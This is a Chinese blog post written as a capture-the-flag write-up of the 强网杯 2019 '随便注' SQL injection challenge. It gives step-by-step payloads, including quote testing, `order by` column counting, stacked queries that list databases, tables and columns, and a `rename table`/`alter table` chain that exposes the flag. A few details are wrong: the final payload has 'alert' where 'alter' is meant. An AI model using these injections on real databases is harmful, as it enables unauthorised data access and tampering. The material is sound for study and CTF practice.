来自 科技 2020-04-26 17:07 的文章

黑客必会之SQL注入学习

[强网杯 2019] 随便注

每天学习网络安全知识,本文记录强网杯的一个SQL注入题。

黑客必会之SQL注入学习


使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞。

黑客必会之SQL注入学习

1'
1''
黑客必会之SQL注入学习

既然此处存在漏洞,那么我们就走正常流程测试下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段数
1' order by 3#
1' order by 2#
黑客必会之SQL注入学习


黑客必会之SQL注入学习


使用第一个payload测试的时候发现页面报错,再使用第二个payload时发现页面显示正常,因此我们可以得知当前数据库当前表存在2个字段。这时候尝试union select进行联合查询。

2.使用联合查询黑客必会之SQL注入学习

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现页面提示过滤了许多关键的命令,看来需要一些骚操作了。

3.尝试堆叠注入
1';show databases#
黑客必会之SQL注入学习

发现成功爆出所有数据库。使用show tables;试试看看能不能得到表名

-1';show tables#
黑客必会之SQL注入学习


成功爆出当前数据库的两个表名;尝试查询表中的字段

0';show columns from `1919810931114514`;#
黑客必会之SQL注入学习

发现有一个flag字段,接下来就是尝试读取flag。

4. 再查看words表的结构
0';desc words;#
黑客必会之SQL注入学习

可以猜测我们提交查询的窗口就是在这个表里查询数据的。

5. 那么查询语句很有可能是 : selsect id,data from words where id =

然后1919810931114514只有一个flag字段这时候虽然有强大的正则过滤,但没有过滤alert和rename关键字这时候我们就可以已下面的骚姿势进行注入:1.将words表改名为word1或其它任意名字2.1919810931114514改名为words3.将新的word表插入一列,列名为id4.将flag列改名为data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#
黑客必会之SQL注入学习

成功拿到flag。